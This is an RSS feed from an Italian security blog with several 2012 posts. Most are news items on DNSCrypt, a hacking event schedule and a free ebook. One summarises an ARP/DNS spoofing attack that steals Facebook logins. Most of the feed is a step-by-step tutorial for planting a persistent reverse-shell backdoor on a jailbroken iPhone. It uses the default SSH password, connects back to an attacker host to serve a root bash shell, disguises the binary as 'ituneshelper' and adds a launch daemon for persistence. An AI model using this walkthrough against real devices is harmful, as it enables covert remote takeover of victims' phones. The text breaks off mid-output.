<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0">

<channel>
	<title>Over Security</title>
	
	<link>http://www.oversecurity.net</link>
	<description>Il Blog Italiano di Sicurezza Informatica</description>
	<lastBuildDate>Thu, 17 May 2012 20:16:38 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/OverSecurity" /><feedburner:info uri="oversecurity" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><item>
		<title>DNSCrypt disponibile per Windows</title>
		<link>http://feedproxy.google.com/~r/OverSecurity/~3/929Fp2AbIM4/</link>
		<comments>http://www.oversecurity.net/2012/05/17/dnscrypt-disponibile-per-windows/#comments</comments>
		<pubDate>Thu, 17 May 2012 20:16:38 +0000</pubDate>
		<dc:creator>Andrea Draghetti</dc:creator>
				<category><![CDATA[Cronaca Informatica]]></category>
		<category><![CDATA[DNS]]></category>
		<category><![CDATA[DNSCrypt]]></category>
		<category><![CDATA[DNSCrypt Windows]]></category>
		<category><![CDATA[opendns]]></category>

		<guid isPermaLink="false">http://www.oversecurity.net/?p=3813</guid>
		<description><![CDATA[DNSCrypt il programma per cifrare tutte le nostre comunicazioni con i server DNS è ora disponibile anche per Windows, arriverà a breve anche la versione per Linux! DNSCrypt permette di risolvere le vulnerabilità legate alle comunicazioni DNS, come la vulnerabilità Kamisky del 2008, proteggendo l’ultimo miglio della connessione ad internet dell’utente, ovvero le comunicazioni tra [...]]]></description>
			<content:encoded><![CDATA[
<p><a href="http://feedads.g.doubleclick.net/~a/Qx2mXS4_xPzuf4Rn4RZPrTqzg0E/0/da"><img src="http://feedads.g.doubleclick.net/~a/Qx2mXS4_xPzuf4Rn4RZPrTqzg0E/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/Qx2mXS4_xPzuf4Rn4RZPrTqzg0E/1/da"><img src="http://feedads.g.doubleclick.net/~a/Qx2mXS4_xPzuf4Rn4RZPrTqzg0E/1/di" border="0" ismap="true"></img></a></p><p><a href="http://www.oversecurity.net/wp-content/uploads/2012/05/Schermata-05-2456065-alle-22.09.49.png" rel="lightbox[3813]" title="DNSCrypt Windows"><img src='http://www.oversecurity.net/wp-content/uploads/2012/05/Schermata-05-2456065-alle-22.09.49.png' class='aligncenter size-full wp-image-3815' width='600' height='384.782608696'/></a></p>
<p><strong>DNSCrypt</strong> il programma per cifrare tutte le nostre comunicazioni con i server DNS è ora disponibile anche per Windows, arriverà a breve anche la versione per Linux!</p>
<p><strong>DNSCrypt</strong> permette di risolvere le vulnerabilità legate alle comunicazioni DNS, come la vulnerabilità <a href="http://www.unixwiz.net/techtips/iguide-kaminsky-dns-vuln.html" target="_blank">Kamisky</a> del 2008, proteggendo l’ultimo miglio della connessione ad internet dell’utente, ovvero le comunicazioni tra ISP e Utente.</p>
<p>In passato ci sono stati numerosi esempi di manomissione, o man-in-the-middle, e snooping del traffico DNS nell’ultimo miglio rappresentando un serio rischio di <strong>sicurezza informatica</strong>. Oggi possiamo risolverli attraverso DNSCrypt.</p>
<p>È possibile <strong>scaricare</strong> il software, attualmente in fase beta, sul sito internet <a href="http://www.opendns.com/technology/dnscrypt/" target="_blank">ufficiale</a>.</p>
<img src="http://feeds.feedburner.com/~r/OverSecurity/~4/929Fp2AbIM4" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.oversecurity.net/2012/05/17/dnscrypt-disponibile-per-windows/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.oversecurity.net/2012/05/17/dnscrypt-disponibile-per-windows/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=dnscrypt-disponibile-per-windows</feedburner:origLink></item>
		<item>
		<title>Al via la Cracca al Tesoro 2012 @ Genova</title>
		<link>http://feedproxy.google.com/~r/OverSecurity/~3/yuN9bmj6LFc/</link>
		<comments>http://www.oversecurity.net/2012/05/12/al-via-la-cracca-al-tesoro-2012-genova/#comments</comments>
		<pubDate>Sat, 12 May 2012 07:51:56 +0000</pubDate>
		<dc:creator>Andrea Draghetti</dc:creator>
				<category><![CDATA[Cronaca Informatica]]></category>
		<category><![CDATA[CAT]]></category>
		<category><![CDATA[cat 2012]]></category>
		<category><![CDATA[Cracca al Tesoro]]></category>
		<category><![CDATA[Paolo Giardini]]></category>
		<category><![CDATA[Pierluigi Perri]]></category>
		<category><![CDATA[Roberto Surlinelli]]></category>

		<guid isPermaLink="false">http://www.oversecurity.net/?p=3795</guid>
		<description><![CDATA[È iniziata da pochissimi minuti la Cracca al Tesoro 2012 che si terrà  alla fiera di Genova, potete seguire l&#8217;evento su Twitter attraverso l&#8217;hastag #catge2012! Il programma della giornata è il seguente: MATTINA 9.30 Paolo Giardini, Alessio Pennasilico: saluti e presentazione ospiti 10.00 Avv. Pierluigi Perri, Università di Milano:  le norme e gli hacker, proposta [...]]]></description>
			<content:encoded><![CDATA[
<p><a href="http://feedads.g.doubleclick.net/~a/CDyHinVZxfkqiMqMdGf8YaEPJdE/0/da"><img src="http://feedads.g.doubleclick.net/~a/CDyHinVZxfkqiMqMdGf8YaEPJdE/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/CDyHinVZxfkqiMqMdGf8YaEPJdE/1/da"><img src="http://feedads.g.doubleclick.net/~a/CDyHinVZxfkqiMqMdGf8YaEPJdE/1/di" border="0" ismap="true"></img></a></p><p><a href="http://www.oversecurity.net/wp-content/uploads/2012/02/cat_2012.png" rel="lightbox[3795]" title="cat_2012"><img src='http://www.oversecurity.net/wp-content/uploads/2012/02/cat_2012.png' class='aligncenter size-full wp-image-3449' width='600' height='132.158590308'/></a></p>
<p>È iniziata da pochissimi minuti la <strong>Cracca al Tesoro</strong> 2012 che si terrà  alla fiera di <strong>Genova</strong>, potete seguire l&#8217;evento su Twitter attraverso l&#8217;hastag <a title="#catge2012" href="https://twitter.com/#%21/search/%23catge2012" data-query-source="hashtag_click"><s>#</s><strong>catge2012</strong></a>!</p>
<p>Il programma della giornata è il seguente:</p>
<blockquote><p><strong>MATTINA</strong></p>
<p><em>9.30</em> Paolo Giardini, Alessio Pennasilico: saluti e presentazione ospiti</p>
<p><em>10.00</em> Avv. Pierluigi Perri, Università di Milano:  le norme e gli hacker, proposta europea sugli strumenti per testare la sicurezza</p>
<p><em>10.15</em><em>Roberto Surlinelli</em>,  Dirigente Capo Polizia Postale:  La polizia Postale ed il contrasto alla criminalità informatica</p>
<p>10.30 tavola rotonda con hacker etici, professionisti della sicurezza informatica, legali, forze di polizia  ed esperti del settore sul tema del contrasto ai crimini informatici.</p>
<p>11.30 Spazio Tooway</p>
<p>1.45 Spazio Fly Communications</p>
<p>12.00 CAT Story. Come funziona, consigli, regolamento (Cristiano Cafferata, Alessio Pennasilico, Paolo Giardini, Raoul Chiesa)</p>
<p>ore 12.30 Q&amp;A</p>
<p>ore 13.00 pausa pranzo</p>
<p>&nbsp;</p>
<p><strong>POMERIGGIO</strong></p>
<p>Ore 14.00 briefing</p>
<p>ore 14.30 via al gioco Cracca Al Tesoro</p>
<p>ore 15.00 via al gioco Running Man</p>
<p>ore 18.30 stop giochi</p>
<p>ore 19.00 premiazione</p>
<p>ore 20.00 aperitivo offerto dagli sponsor</p></blockquote>
<p><strong>Buona Giornata!</strong></p>
<img src="http://feeds.feedburner.com/~r/OverSecurity/~4/yuN9bmj6LFc" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.oversecurity.net/2012/05/12/al-via-la-cracca-al-tesoro-2012-genova/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.oversecurity.net/2012/05/12/al-via-la-cracca-al-tesoro-2012-genova/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=al-via-la-cracca-al-tesoro-2012-genova</feedburner:origLink></item>
		<item>
		<title>Attacco ARP/DNS Spoofing per recuperare informazione private</title>
		<link>http://feedproxy.google.com/~r/OverSecurity/~3/gvNqo4khHNg/</link>
		<comments>http://www.oversecurity.net/2012/05/05/attacco-arpdns-spoofing-per-recuperare-informazione-private/#comments</comments>
		<pubDate>Sat, 05 May 2012 08:00:05 +0000</pubDate>
		<dc:creator>Andrea Draghetti</dc:creator>
				<category><![CDATA[Articoli Tecnici]]></category>
		<category><![CDATA[ARP spoofing]]></category>
		<category><![CDATA[Arp-Scan]]></category>
		<category><![CDATA[BackBox]]></category>
		<category><![CDATA[DNS Spoofing]]></category>
		<category><![CDATA[EvilSocket]]></category>
		<category><![CDATA[la]]></category>
		<category><![CDATA[Net Command]]></category>
		<category><![CDATA[recupero password]]></category>
		<category><![CDATA[set]]></category>
		<category><![CDATA[video]]></category>

		<guid isPermaLink="false">http://www.oversecurity.net/?p=3786</guid>
		<description><![CDATA[Il blog Security Obscurity ha recentemente pubblicato un interessante video in cui mostra come un utente malintenzionato può recuperare le credenziale degli utenti che tentano di loggarsi in una piattaforma WEB in un ambiente LAN. Per sferrare l&#8217;attacco viene usato l&#8217;applicativo SET simulando il recupero delle credenziali di accesso di un utente che tenta di [...]]]></description>
			<content:encoded><![CDATA[
<p><a href="http://feedads.g.doubleclick.net/~a/HnuMEgxYxF5GevFCERzQopKUOTI/0/da"><img src="http://feedads.g.doubleclick.net/~a/HnuMEgxYxF5GevFCERzQopKUOTI/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/HnuMEgxYxF5GevFCERzQopKUOTI/1/da"><img src="http://feedads.g.doubleclick.net/~a/HnuMEgxYxF5GevFCERzQopKUOTI/1/di" border="0" ismap="true"></img></a></p><p style="text-align: center;"><p><a href="http://www.oversecurity.net/2012/05/05/attacco-arpdns-spoofing-per-recuperare-informazione-private/"><em>Clicca qui per vedere il video incorporato.</em></a></p></p>
<p style="text-align: left;">Il blog <strong><a href="http://security-obscurity.blogspot.it/2012/04/arpdns-spoofing-steal-facebook-password.html" target="_blank">Security Obscurity</a></strong> ha recentemente pubblicato un interessante video in cui mostra come un utente malintenzionato può <strong>recuperare le credenziale</strong> degli utenti che tentano di loggarsi in una piattaforma WEB in un ambiente LAN.</p>
<p style="text-align: left;">Per <strong>sferrare l&#8217;attacco</strong> viene usato l&#8217;applicativo <strong>SET</strong> simulando il recupero delle credenziali di accesso di un utente che tenta di collegarsi al noto Social Network Facebook, SET avrà il compito di <strong>clonare</strong> l&#8217;attuale homepage di Facebook e configurare un server in ascolto sulla porta 80 con il portale clonato.</p>
<p style="text-align: left;">Successivamente con un<strong> Arp-Scan</strong> vengono identificate le potenziali vittime nella rete e sfruttando<strong> Net Command</strong> di Evilsocket si esegue un <strong>Arp Spoofing</strong> per reindirizzare il traffico attraverso l&#8217;attaccante.</p>
<p style="text-align: left;">Infine si effettua un <strong>DNS Spoofing </strong> così tutte le richieste inviate dalla vittima verranno reindirizzate all&#8217;attaccante, compresi i dati di login.</p>
<p style="text-align: left;">Per tutti i dettagli e le procedure potete consultare i <strong>video</strong> di apertura.</p>
<img src="http://feeds.feedburner.com/~r/OverSecurity/~4/gvNqo4khHNg" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.oversecurity.net/2012/05/05/attacco-arpdns-spoofing-per-recuperare-informazione-private/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		<feedburner:origLink>http://www.oversecurity.net/2012/05/05/attacco-arpdns-spoofing-per-recuperare-informazione-private/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=attacco-arpdns-spoofing-per-recuperare-informazione-private</feedburner:origLink></item>
		<item>
		<title>[eBook Gratuito] Il Giornalista Hacker</title>
		<link>http://feedproxy.google.com/~r/OverSecurity/~3/QjMD_XAEQ-k/</link>
		<comments>http://www.oversecurity.net/2012/05/04/ebook-gratuito-il-giornalista-hacker/#comments</comments>
		<pubDate>Fri, 04 May 2012 08:00:08 +0000</pubDate>
		<dc:creator>Andrea Draghetti</dc:creator>
				<category><![CDATA[Comunicazioni di Servizio]]></category>
		<category><![CDATA[download]]></category>
		<category><![CDATA[ebook]]></category>
		<category><![CDATA[festival internazionale del giornalismo]]></category>
		<category><![CDATA[Giovanni Ziccardi]]></category>
		<category><![CDATA[Il giornalista Hacker]]></category>
		<category><![CDATA[Ziccardi]]></category>

		<guid isPermaLink="false">http://www.oversecurity.net/?p=3780</guid>
		<description><![CDATA[Marsilio Editori, in collaborazione con il Festival Internazionale del Giornalismo di Perugia (25-29 aprile 2012), distribuisce gratuitamente Il giornalista Hacker. Piccola guida per un uso sicuro e consapevole della tecnologia di Giovanni Ziccardi, un agile volumetto in cui l’autore descrive e spiega alcuni trucchi da hacker che possono rivelarsi di grande utilità per chi esercita [...]]]></description>
			<content:encoded><![CDATA[
<p><a href="http://feedads.g.doubleclick.net/~a/k0evqS1AvuvlyifmMk1v4OPQyxk/0/da"><img src="http://feedads.g.doubleclick.net/~a/k0evqS1AvuvlyifmMk1v4OPQyxk/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/k0evqS1AvuvlyifmMk1v4OPQyxk/1/da"><img src="http://feedads.g.doubleclick.net/~a/k0evqS1AvuvlyifmMk1v4OPQyxk/1/di" border="0" ismap="true"></img></a></p><p><a href="http://www.oversecurity.net/wp-content/uploads/2012/05/Schermata-05-2456050-alle-12.39.13.png" rel="lightbox[3780]" title="Il Giornalista Hacker"><img src='http://www.oversecurity.net/wp-content/uploads/2012/05/Schermata-05-2456050-alle-12.39.13.png' class='aligncenter size-full wp-image-3781' width='600' height='861.538461538'/></a><strong></strong></p>
<p><strong>Marsilio Editori</strong>, in collaborazione con il <a href="http://www.festivaldelgiornalismo.com/" target="_blank">Festival Internazionale del Giornalismo</a> di Perugia (25-29 aprile 2012), distribuisce gratuitamente <strong><em>Il giornalista Hacker.</em></strong> Piccola guida per un uso sicuro e consapevole della tecnologia di <strong><a href="http://www.ziccardi.org/" target="_blank">Giovanni Ziccardi</a></strong>, un agile volumetto in cui l’autore descrive e spiega alcuni <strong>trucchi da hacker</strong> che possono rivelarsi di grande utilità per chi esercita oggi una professione delicata e costantemente a rischio per quanto riguarda la sicurezza informatica come quella del giornalista. La guida può essere utile anche ad avvocati, blogger, attivisti ecc.</p>
<p>«Di certo, il senso delle regole elementari che seguono non è quello di voler far diventare chiunque “hacker in un’ora”» scrive Ziccardi nella prefazione che è possibile leggere interamente sul sito del Festival. «Il percorso verso l’hacking è lungo, tormentato, fatto di tante prove e curiosità, di tentativi, di errori. Però è pur vero che <strong>tutti possono essere un po’ hacker nella vita quotidiana</strong>, ossia possono cercare di superare quel velo di normalità cui le tecnologie di oggi ci abituano e spingersi, anche solo per curiosità, verso strumenti che possano portare benefici immediati anche nella vita informatica di tutti i giorni e, soprattutto, nelle professioni più delicate.»</p>
<p>Potete <strong>scaricare</strong> l&#8217;eBook Gratuito <a title="Il giornalista hacker ANTEPRIMA" href="http://blog.marsilioeditori.it/files/2012/04/Il_giornalista_hacker.pdf" target="_blank">cliccando qui</a> in formato PDF oppure è disponibile in formato epub in tutti gli store che distribuiscono gli ebook Marsilio per esempio <a href="http://www.amazon.it/Il-giornalista-hacker-ebook/dp/B007XIEHQU" target="_blank">Amazon Kindle Store</a>.</p>
<img src="http://feeds.feedburner.com/~r/OverSecurity/~4/QjMD_XAEQ-k" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.oversecurity.net/2012/05/04/ebook-gratuito-il-giornalista-hacker/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		<feedburner:origLink>http://www.oversecurity.net/2012/05/04/ebook-gratuito-il-giornalista-hacker/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=ebook-gratuito-il-giornalista-hacker</feedburner:origLink></item>
		<item>
		<title>Creiamo una Backdoor permanente su iOS</title>
		<link>http://feedproxy.google.com/~r/OverSecurity/~3/Fz-05zDWzho/</link>
		<comments>http://www.oversecurity.net/2012/05/03/creiamo-una-backdoor-permanente-su-ios/#comments</comments>
		<pubDate>Thu, 03 May 2012 08:00:25 +0000</pubDate>
		<dc:creator>Andrea Draghetti</dc:creator>
				<category><![CDATA[Articoli Tecnici]]></category>
		<category><![CDATA[accesso remoto]]></category>
		<category><![CDATA[alpine]]></category>
		<category><![CDATA[backdoor]]></category>
		<category><![CDATA[iOS]]></category>
		<category><![CDATA[ipad]]></category>
		<category><![CDATA[iphone]]></category>
		<category><![CDATA[Jailbreak]]></category>
		<category><![CDATA[openssh]]></category>
		<category><![CDATA[password]]></category>

		<guid isPermaLink="false">http://www.oversecurity.net/?p=3769</guid>
		<description><![CDATA[Il blog Coresec ha recentemente pubblicato una interessante guida su come installare una Backdoor permanente su un dispositivo iOS (iPhone, iPod Touch e iPad) a patto che il sistema sia stata Jailbrekkato e quindi vi siano attivi i permessi di root. Molti utenti effettuando la procedura di Jailbreak per avere facilmente accesso ai propri file [...]]]></description>
			<content:encoded><![CDATA[
<p><a href="http://feedads.g.doubleclick.net/~a/-LXz_N3DloCFHAri_IpGPJwqFTQ/0/da"><img src="http://feedads.g.doubleclick.net/~a/-LXz_N3DloCFHAri_IpGPJwqFTQ/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/-LXz_N3DloCFHAri_IpGPJwqFTQ/1/da"><img src="http://feedads.g.doubleclick.net/~a/-LXz_N3DloCFHAri_IpGPJwqFTQ/1/di" border="0" ismap="true"></img></a></p><p><a href="http://www.oversecurity.net/wp-content/uploads/2012/04/iphone.ipad_.permanent.backdoored.jpg" rel="lightbox[3769]" title="iphone.ipad_.permanent.backdoored"><img class="aligncenter size-full wp-image-3770" title="iphone.ipad_.permanent.backdoored" src="http://www.oversecurity.net/wp-content/uploads/2012/04/iphone.ipad_.permanent.backdoored.jpg" alt="" width="568" height="266" /></a></p>
<p>Il blog <strong><a href="http://www.coresec.org/2012/04/24/permanent-reverse-backdoor-for-iphone-ipad/" target="_blank">Coresec</a></strong> ha recentemente pubblicato una interessante guida su come installare una <strong>Backdoor</strong> <strong>permanente</strong> su un dispositivo <strong>iOS</strong> (iPhone, iPod Touch e iPad) a patto che il sistema sia stata Jailbrekkato e quindi vi siano attivi i permessi di root.</p>
<p>Molti utenti effettuando la procedura di <strong>Jailbreak</strong> per avere facilmente accesso ai propri file o alle applicazioni (per poi essere illegalmente copiate), questa procedura prevede l&#8217;installazione del pacchetto OpenSSH che permette di accedere remotamente al dispositivo tramite una semplice sessione SSH. Purtroppo gli utenti <strong>incuranti della sicurezza</strong> non procedono a cambiare la password di default (alpine) e quindi basta ritrovarsi collegati ad una rete wireless pubblica per essere una probabile vittima di un attaccante.</p>
<p>In questo articolo supponiamo che Mario abbia effettuato il Jailbreak del suo iPhone, installato OpenSSH senza cambiare la password di default e si trova all&#8217;Università dove è disponibile una rete WiFi pubblica senza alcuna protezione di tipo &#8220;Client Isolation&#8221;.</p>
<p>L&#8217;attaccante procederà ad una scansione di rete all&#8217;interno della rete WiFi dell&#8217;università, individuerà l&#8217;iPhone di Mario con il quale aprirà semplicemente una <strong>sessione SSH</strong>. Successivamente procederà all&#8217;installazione della <a href="http://packetstormsecurity.org/files/34401/sbd-1.36.tar.gz.html" target="_blank">Backdoor sbd-1.36</a> sviluppata da Michel Blomgren.</p>
<p><span id="more-3769"></span></p>
<p><strong>Una volta aperta la sessione SSH procediamo all&#8217;installazione ed esecuzione delle pacchetto iphone-gcc</strong></p>
<pre class="brush: plain; title: ; notranslate">

iphone4:~ root# uname -an
Darwin iphone4 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov 1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin

iphone4:~ root# apt-get update
Get:1 http://repo.biteyourapple.net ./ Release.gpg [490B]
Hit http://cydia.zodttd.com stable Release.gpg
Hit http://apt.saurik.com ios/675.00 Release.gpg
Hit http://repo.insanelyi.com ./ Release.gpg
...

iphone4:~ root# apt-get install iphone-gcc
Reading package lists... Done
Building dependency tree
Reading state information... Done
...
Setting up ldid (610-5) ...
Setting up com.sull.iphone-gccheaders (1.0-11) ...
Setting up com.sull.fake-libgcc (1.0-2) ...
Setting up iphone-gcc (4.2-20080604-1-8) ...

iphone4:~/sbd-1.36 root# apt-get install make
Reading package lists... Done
Building dependency tree
Reading state information... Done
...
Unpacking make (from .../make_3.81-2_iphoneos-arm.deb) ...
Setting up make (3.81-2) ...
</pre>
<p><strong>Scarichiamo ed estraiamo la Backdoor</strong></p>
<pre class="brush: plain; title: ; notranslate">

iphone4:~ root# wget http://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz
--2012-04-23 23:50:43-- http://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz
Resolving packetstorm.tacticalflex.com... 173.160.180.156
Connecting to packetstorm.tacticalflex.com|173.160.180.156|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 84093 (82K) [application/x-gzip]
Saving to: `sbd-1.36.tar.gz'

100%[======================================&gt;] 84,093 66.3K/s in 1.2s

2012-04-23 23:50:45 (66.3 KB/s) - `sbd-1.36.tar.gz' saved [84093/84093]

iphone4:~ root# tar -zxvf sbd-1.36.tar.gz
sbd-1.36/
sbd-1.36/sbd.c
sbd-1.36/doexec.c
sbd-1.36/pel.c
sbd-1.36/aes.c
sbd-1.36/sha1.c
sbd-1.36/socket_code.h
sbd-1.36/pel.h
sbd-1.36/aes.h
sbd-1.36/sha1.h
sbd-1.36/sbd.h
sbd-1.36/doexec_unix.h
sbd-1.36/doexec_win32.h
sbd-1.36/readwrite.h
sbd-1.36/misc.h
sbd-1.36/Makefile
sbd-1.36/mktarball.sh
sbd-1.36/README
sbd-1.36/COPYING
sbd-1.36/CHANGES
sbd-1.36/binaries/
sbd-1.36/binaries/sbd.exe
sbd-1.36/binaries/sbdbg.exe

iphone4:~ root# cd sbd-1.36
iphone4:~/sbd-1.36 root# ls -al
total 224
drwx------ 3 1000 100 748 Sep 17 2004 ./
drwxr-x--- 6 root wheel 272 Apr 23 23:50 ../
-rw------- 1 1000 100 1876 Sep 17 2004 CHANGES
-rw------- 1 1000 100 18007 Jun 8 2004 COPYING
-rw------- 1 1000 100 2176 Jun 20 2004 Makefile
-rw------- 1 1000 100 4880 Sep 11 2004 README
-rw------- 1 1000 100 31370 Jun 12 2004 aes.c
-rw------- 1 1000 100 549 Jun 11 2004 aes.h
drwx------ 2 1000 100 136 Sep 11 2004 binaries/
-rw------- 1 1000 100 77 Jun 2 2004 doexec.c
-rw------- 1 1000 100 7114 Sep 11 2004 doexec_unix.h
-rw------- 1 1000 100 19060 Sep 8 2004 doexec_win32.h
-rw------- 1 1000 100 14968 Sep 9 2004 misc.h
-rwx------ 1 1000 100 624 Jun 13 2004 mktarball.sh*
-rw------- 1 1000 100 13381 Sep 8 2004 pel.c
-rw------- 1 1000 100 898 Sep 9 2004 pel.h
-rw------- 1 1000 100 9829 Sep 9 2004 readwrite.h
-rw------- 1 1000 100 20557 Sep 9 2004 sbd.c
-rw------- 1 1000 100 2014 Jun 8 2004 sbd.h
-rw------- 1 1000 100 8900 Jun 2 2004 sha1.c
-rw------- 1 1000 100 436 Jun 2 2004 sha1.h
-rw------- 1 1000 100 20800 Sep 9 2004 socket_code.h
</pre>
<p><strong>Procediamo alla configurazione della Backdoor</strong> (esecuzione come demone, indirizzo ip, porta, password, impostazioni di crittografia, ecc ecc).</p>
<pre class="brush: plain; title: ; notranslate">

iphone4:~/sbd-1.36 root# cat sbd.h
#define SOURCE_PORT 0
#define CONVERT_TO_CRLF 0
#define ENCRYPTION 1
#define SHARED_SECRET &quot;password&quot;
#define QUIET 0
#define VERBOSE 0
#define DAEMONIZE 0
#define HIGHLIGHT_INCOMING 0
#define HIGHLIGHT_PREFIX &quot;\x1b[0;32m&quot;
#define HIGHLIGHT_SUFFIX &quot;\x1b[0m&quot;
#define SEPARATOR_BETWEEN_PREFIX_AND_DATA &quot;: &quot;
#define RUN_ONLY_ONE_INSTANCE 0
#define INSTANCE_SEMAPHORE &quot;shadowinteger_bd_semaphore&quot;

/* connect to 192.168.200.22 on port 443 (https) and serve /bin/bash.
* reconnect every 10 seconds.
*/

#define DOLISTEN 0
#define HOST &quot;192.168.200.22&quot;
#define PORT 443
#define RESPAWN_ENABLED 1
#define RESPAWN_INTERVAL 10
#define EXECPROG &quot;/bin/bash&quot;
</pre>
<p><strong>Compiliamo SBD</strong></p>
<pre class="brush: plain; title: ; notranslate">
&lt;pre&gt;iphone4:~/sbd-1.36 root# make
usage:
make unix - Linux, NetBSD, FreeBSD, OpenBSD
make sunos - SunOS (Solaris)
make win32 - native win32 console app (w/ Cygwin + MinGW)
make win32bg - create a native win32 no-console app (w/ Cygwin + MinGW)
make win32bg CFLAGS=-DSTEALTH - stealthy no-console app
make mingw - native win32 console app (w/ MinGW MSYS)
make mingwbg - native win32 no-console app (w/ MinGW MSYS)
make cygwin - Cygwin console app
make darwin - Darwin

iphone4:~/sbd-1.36 root# make darwin
rm -f sbd sbd.exe *.o core
gcc -Wall -Wshadow -O2 -o sbd pel.c aes.c sha1.c doexec.c sbd.c
strip sbd

iphone4:~/sbd-1.36 root# ls -al sbd
-rwxr-xr-x 1 root 100 55296 Apr 24 02:10 sbd*
</pre>
<p><strong>Impostiamo l&#8217;avvio automatico della Backdoor attraverso LaunchDaemons</strong></p>
<pre class="brush: plain; title: ; notranslate">
iphone4:~/sbd-1.36 root# cp sbd /usr/bin/ituneshelper
iphone4:~/sbd-1.36 root# cd /Library/LaunchDaemons/
iphone4:/Library/LaunchDaemons root# ls -al
total 16
drwxr-xr-x 2 root wheel 136 Apr 24 02:02 ./
drwxrwxr-x 18 root admin 816 Dec 31 15:38 ../
-rw-r--r-- 1 root wheel 847 Feb 15 2011 com.openssh.sshd.plist

iphone4:/Library/LaunchDaemons root# cat &lt;&lt; EOF &gt;&gt; com.ituneshelper.start.plist
&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
&lt;!DOCTYPE plist PUBLIC &quot;-//Apple//DTD PLIST 1.0//EN&quot; &quot;http://www.apple.com/DTDs/PropertyList-1.0.dtd&quot;&gt;
&lt;plist version=&quot;1.0&quot;&gt;
&lt;dict&gt;
&lt;key&gt;Label&lt;/key&gt;
&lt;string&gt;com.ituneshelper.start&lt;/string&gt;
&lt;key&gt;ProgramArguments&lt;/key&gt;
&lt;array&gt;
&lt;string&gt;/usr/bin/ituneshelper&lt;/string&gt;
&lt;/array&gt;
&lt;key&gt;RunAtLoad&lt;/key&gt;
&lt;true/&gt;
&lt;key&gt;StartInterval&lt;/key&gt;
&lt;integer&gt;1&lt;/integer&gt;
&lt;/dict&gt;
&lt;/plist&gt;
EOF

iphone4:/Library/LaunchDaemons root# ls -al
total 16
drwxr-xr-x 2 root wheel 136 Apr 24 02:15 ./
drwxrwxr-x 18 root admin 816 Dec 31 15:38 ../
-rw-r--r-- 1 root wheel 404 Apr 24 02:01 com.ituneshelper.start.plist
-rw-r--r-- 1 root wheel 847 Feb 15 2011 com.openssh.sshd.plist
</pre>
<p><strong>L&#8217;installazione della Backdoor è conclusa, procediamo quindi a testare la connessione dal nostro PC</strong></p>
<pre class="brush: plain; title: ; notranslate">
root@coresec:~# uname -an
Linux coresec 3.0.0-17-generic #30-Ubuntu SMP Thu Mar 8 20:45:39 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux

root@coresec:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:03:72:5e
          inet addr:192.168.200.22  Bcast:192.168.200.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe03:725e/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:14741 errors:0 dropped:0 overruns:0 frame:0
          TX packets:10042 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:20159805 (20.1 MB)  TX bytes:720669 (720.6 KB)

root@coresec:/home/enzo/sbd-1.36# ./sbd -l -p 443 -k password
id
uid=0(root) gid=0(wheel) groups=0(wheel)
/bin/bash -i
bash: no job control in this shell
bash-4.0# ps -ef
UID PID PPID C STIME TTY TIME CMD
0 1 0 0 0:00.00 ?? 0:00.95 /sbin/launchd
0 19 1 0 0:00.00 ?? 0:00.95 /usr/libexec/UserEventAgent -l System
0 21 1 0 0:00.00 ?? 0:00.68 /usr/sbin/notifyd
0 23 1 0 0:00.00 ?? 0:00.41 /usr/sbin/syslogd
0 25 1 0 0:00.00 ?? 0:01.64 /usr/libexec/configd
25 27 1 0 0:00.00 ?? 0:01.53 /System/Library/Frameworks/CoreTelephony.framework/Support/CommCenterClassic
501 29 1 0 0:00.00 ?? 0:12.27 /System/Library/CoreServices/SpringBoard.app/SpringBoard
